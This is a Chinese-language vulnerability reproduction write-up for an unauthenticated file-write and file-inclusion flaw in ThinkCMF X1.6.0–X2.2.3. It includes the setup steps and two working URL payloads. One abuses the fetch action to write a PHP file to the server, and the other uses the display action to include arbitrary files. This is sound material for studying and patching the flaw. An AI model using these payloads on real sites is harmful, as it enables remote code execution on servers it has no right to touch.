ThinkCMF框架任意内容包含漏洞复现
时间:2019-11-12
本文章向大家介绍ThinkCMF框架任意内容包含漏洞复现,主要包括ThinkCMF框架任意内容包含漏洞复现使用实例、应用技巧、基本知识点总结和需要注意事项,具有一定的参考价值,需要的朋友可以参考一下。
1. 漏洞概述
ThinkCMF是一款基于PHP+MYSQL开发的中文内容管理框架,底层采用ThinkPHP3.2.3构建。
利用此漏洞无需任何权限情况下,构造恶意的url,可以向服务器写入任意内容的文件,实现远程代码执行
2.影响范围
1 ThinkCMF X1.6.0
2 ThinkCMF X2.1.0
3 ThinkCMF X2.2.0
4 ThinkCMF X2.2.1
5 ThinkCMF X2.2.2
6 ThinkCMF X2.2.3
3.复现
环境搭建
我用的是phpstudy搭建ThinkCMF X2.2.3
要用nginx,不然提示没有权限
根据安装向导安装即可
4.漏洞利用
方法一:
通过构造a参数的fetch方法,可以不需要知道文件路径就可以把php代码写入文件
phpinfo版payload如下:
1 ?a=fetch&templateFile=public/index&prefix=''&content=<php>file_put_contents('test.php','<?php phpinfo(); ?>')</php>
利用结果
访问写入的文件
第二种
通过构造a参数的display方法,实现任意内容包含漏洞
payload:
1 ?a=display&templateFile=README.md
参考文章:
https://www.freebuf.com/vuls/217586.html
原文地址:https://www.cnblogs.com/lanyincao/p/11844537.html
- 浅谈JavaScript的Canvas(绘制图形)
- 浅谈JavaScript的事件(事件流)
- 浅谈JavaScript的函数表达式(递归)
- 浅谈JavaScript的事件(事件模拟)
- Spring中@Transactional事务回滚实例及源码
- 浅谈JavaScript的函数表达式(闭包)
- 浅谈JavaScript的事件(事件类型)
- 17年编程生涯的三大经验总结
- 浅谈JavaScript的面向对象程序设计(四)
- 浅谈JavaScript的事件(事件对象)
- 浅谈JavaScript的字符串的replace方法
- 西方红玫瑰和辣条先生黑产组织深度分析报告
- HTTPS劫匪木马暴力升级:破坏ARK攻击杀软
- CSS样式表基础
- JavaScript 教程
- JavaScript 编辑工具
- JavaScript 与HTML
- JavaScript 与Java
- JavaScript 数据结构
- JavaScript 基本数据类型
- JavaScript 特殊数据类型
- JavaScript 运算符
- JavaScript typeof 运算符
- JavaScript 表达式
- JavaScript 类型转换
- JavaScript 基本语法
- JavaScript 注释
- Javascript 基本处理流程
- Javascript 选择结构
- Javascript if 语句
- Javascript if 语句的嵌套
- Javascript switch 语句
- Javascript 循环结构
- Javascript 循环结构实例
- Javascript 跳转语句
- Javascript 控制语句总结
- Javascript 函数介绍
- Javascript 函数的定义
- Javascript 函数调用
- Javascript 几种特殊的函数
- JavaScript 内置函数简介
- Javascript eval() 函数
- Javascript isFinite() 函数
- Javascript isNaN() 函数
- parseInt() 与 parseFloat()
- escape() 与 unescape()
- Javascript 字符串介绍
- Javascript length属性
- javascript 字符串函数
- Javascript 日期对象简介
- Javascript 日期对象用途
- Date 对象属性和方法
- Javascript 数组是什么
- Javascript 创建数组
- Javascript 数组赋值与取值
- Javascript 数组属性和方法
- 一文学会爬虫技巧
- 为什么机器学习应用交易那么难(中)
- 消息队列的消费幂等性如何保证
- js中数组Array.reduce方法介绍及使用场景
- 推荐一套基于go开发的文档管理系统
- 如何通过容器搭建稳定可靠的私有网盘(NextCloud)
- Flutter实现倒计时功能
- Excelize 2.3.0 发布, Go 语言 Excel 基础库
- 网站渗透攻防Web篇之SQL注入攻击高级篇
- 网站渗透攻防Web篇之SQL注入攻击中级篇
- Go 语言学习之 method
- 网站渗透攻防Web篇之SQL注入攻击初级篇
- VBA解析复合文档05——读取数据流
- C++核心准则E.25:如果不能抛出异常,模仿RAII方式进行资源管理
- VBA解析复合文档06——改写数据流